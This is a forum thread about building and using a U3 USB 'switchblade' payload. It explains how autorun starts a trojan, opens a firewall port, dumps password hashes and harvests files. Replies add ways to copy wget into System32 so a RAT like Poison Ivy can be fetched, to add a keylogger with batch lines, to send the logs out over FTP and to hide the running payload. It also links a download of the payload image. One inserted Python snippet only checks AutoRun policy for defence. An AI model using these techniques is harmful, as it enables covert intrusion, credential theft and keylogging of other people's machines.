DingleBerries

0x3, I am a bit confused about your question. Are you talking about installing asp shells and disabling the firewall? I do not have any Server 2003 VMs atm, but that is easy to get ;). I was thinking about rewriting the backdoor in the future to support more things, and making it drop a file should be easy, i.e. have it sitting in the code then print it out to a text document named shell.php. It may take me a while, school and what not, but I will try to release what I can when I can (not all of my tools are here :, save the good stuff for myself :P).

Let me explain it a bit more in detail.

There are two folders (CD, Flash). The Flash folder has 2 files (2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan (makPMF I think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe.

On the flash side, just put all the files on the root of your drive. Dingleberries.exe grabs some info from the PC, writes the computer's info to a txt file, writes the registry value to autorun the trojan, and then calls slurp.exe (you can remove slurp and replace it with PWDUMP, just rename it slurp.exe). Slurp looks in the ini to find out what file types you want slurped up and puts them in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exists it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands.

To use this you will need to make an ISO of the cd folder and flash that to the u3 side.

Thanks great answer.

Just a few more noobish questions:

- I do know how to create an ISO file but how do I flash the usb-drive with it?

- Does Leroy Jenkins work with a router that blocks ports?

- Is it possible to get the usb-drive not showing up options when inserting it what to do with it?

I tried out the latest version of slurp and it worked great and really quick.

Does it only search in C:\ and is it possible to search for specific names also along with the other search?

What am I able to do with the python trojan?

This release was amazing, just tell me if I could help you somehow.

Regards Humper

[sic] but how do I flash the usb-drive with it?

Universal Customizer. There are a few versions floating around. The newest version works in Vista as well as on 4GB< drives.

Does leroy jenkis work with an router that blocks ports

Leroy Jenkins just starts the payload; makPNF.exe is the actual Trojan, and atm it does not. Later I may release a UDP version that will work on routers that block ports.

Is it possible to get the usb-drive not showing up options when inserting it what to do with it?

I have no idea what that even means.

Does it only search in C:\ and is it possible to search for specific names

It searches HOME DRIVE/HOMEPATH, so if your drive letter is F:\ it will still work. The rest of the payload relies on the drive being the C:\ drive, but that isn't a hard fix; remember this was done in less than a day. Right now it will only do extensions. Adding complete file names never really crossed my mind, I will look into it though.

Cheers!

This is probably a dumb question... but how do I protect my computer from the programs once I put it on my U3?

Because the current switchblade's payload still attacks my computer when I set it to protect my computer against it. O.o

EDITTTTT scratch that!!! I'll just turn my auto-run off >.<

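A defensive check to go with the auto-run remark above, as an added example that is not part of the thread or of any tool discussed in it: it decodes the Windows `NoDriveTypeAutoRun` policy bitmask and reports whether the two halves of a U3 stick (emulated CD-ROM and removable disk) could still trigger AutoRun. The function names and the sample masks are assumptions made for the example.

```python
# Added example: decode the NoDriveTypeAutoRun policy bitmask.
# A set bit DISABLES AutoRun for that drive type. Sample masks are constructed.
DRIVE_TYPE_BITS = {
    0x01: "unknown",
    0x02: "no_root_dir",
    0x04: "removable",
    0x08: "fixed",
    0x10: "network",
    0x20: "cdrom",
    0x40: "ramdisk",
    0x80: "reserved",
}

def autorun_enabled_types(mask):
    """Drive types whose AutoRun is still allowed under this mask."""
    return sorted(n for bit, n in DRIVE_TYPE_BITS.items() if not mask & bit)

def u3_exposure(mask):
    """A U3 stick enumerates as an emulated CD-ROM (the 'CD partition') plus
    a removable disk (the 'flash side'); report which can still AutoRun."""
    enabled = autorun_enabled_types(mask)
    return {"cd_partition": "cdrom" in enabled,
            "flash_side": "removable" in enabled}

def read_local_policy():
    """Machine-wide policy value on Windows; None if unset or not Windows."""
    try:
        import winreg
    except ImportError:
        return None
    path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
    except OSError:
        return None
    if isinstance(value, bytes):  # value may be stored as REG_BINARY
        value = int.from_bytes(value, "little")
    return int(value)

if __name__ == "__main__":
    masks = {"0x91": 0x91, "0x95": 0x95, "0xFF": 0xFF}
    local = read_local_policy()
    if local is not None:
        masks["this machine"] = local
    for label, mask in masks.items():
        print(label, u3_exposure(mask), autorun_enabled_types(mask))
```

A mask that only sets the removable bit still leaves the CD-ROM side able to AutoRun, which is why `0xFF` is the value that closes both.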

Just a few more questions if I may... :P

With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works.

With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan?

Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.<

Thanks. :)

If I understood it right you need to download python and then just write testconnection (IP ADDRESS).

For the rest just read the whole topic and you will get answers to that.

Regards Humper

Ok thanks.

Once python is installed, windows or linux, then you double click the pyw (windows) or ./client.pyw (linux). A GUI will pop up asking for the IP address and below that there is a place to send commands. If you want to modify the payload add wget.exe to the CD partition and have it copy to the System root, best if you rename it, then you can download files from online and execute them via cmd. This is useful if you have a better RAT, i.e. Poison IVY, and want to install the server to the remote computer.

To add wget just modify the batch file

xcopy wget.exe C:\Windows\System32

And if you add the keylogger to it, Windows has a built-in ftp command. That means you can remotely upload the log file to some ftp server and read the contents without going back. Just like in linux there are a lot of things that can be done via command line in windows, just read and research. THE MORE YOU KNOW!

Also I haven't tested it, but does the batch file show a window when the drive is inserted? Or are there any signs, other than opening Task Manager, that the payload is running?

I'm getting an error with trying to create the new CD partition ISO with Universal Customizer...

So I'm wondering what I'm doing wrong...

I archived all the files in the CD folder and named the .rar U3CUSTOM... then I put the .rar into the BIN folder in the UC and ran it and got the error

Failed to access your U3 smart drive. U3 Customizer will now shut down.

And this is the error that comes up with the log in U3

[MUSK] [408][01:40:22]: CCDServiceImpl::burnImage - failed to open image file C:\UC\bin\U3CUSTOM.ISO

I've tried many different ways to fix it... The older versions of my switchblade still work... so I dunno. If anyone can help... then yeah. :D I'll bake you brownies. <}

Ok I've flashed the drive and added the "flash" folder to the root.

But I still don't really get what client I should use for the keylogger.

Also where does it save the IP and the computer info?

Also how do I remove all of the files, keylogger and so that I enter to the computer?

Regards Humper

The FLASH folder's CONTENTS go in the root of the flash drive, not the folder itself. There is no key logger in the payload... If you read the code in the bat, which runs the shit from flash, you will see how most of it works.. That is why I encouraged people to add to this. If you can't figure it out then I don't really care, it has worked on all the systems I have tested it on.

http://rapidshare.com/files/216560498/U3.iso

THIS ISO DOES NOT WORK. REMEMBER YOU HAVE TO CHANGE THE BAT FILE!

Send me a message w/ an address and I'll make you the brownies ^.^

When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me the same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partition works... I dunno...

It's running one extra command; cd SYS VOLUME. I have a personal payload that uses that folder. So if you want you can make a folder named SYS VOLUME and put all the other stuff in there and it will work the same way. To add the keylogger add this to the beginning of the batch file

xcopy keylogger.exe C:\\Where\ever\

It would copy it and then carry out the rest of the instructions.

I'm not having a problem with the programs or anything... Universal Customizer won't add the ISO to the CD partition of the U3 device when I change the .bat file... when I don't mess with anything and use the one that you made it works just fine...

I've got a weird problem here. I've got everything working great but the slurper only copies the last extension I put into the slurp.ini file ... my ini file looks like this:

#Place file types here

[File Types]

Extensions = .gif

Extensions = .jpg

Extensions = .pdf

Extensions = .txt

but it only slurps the .txt file

on other versions of your slurper it worked without problems
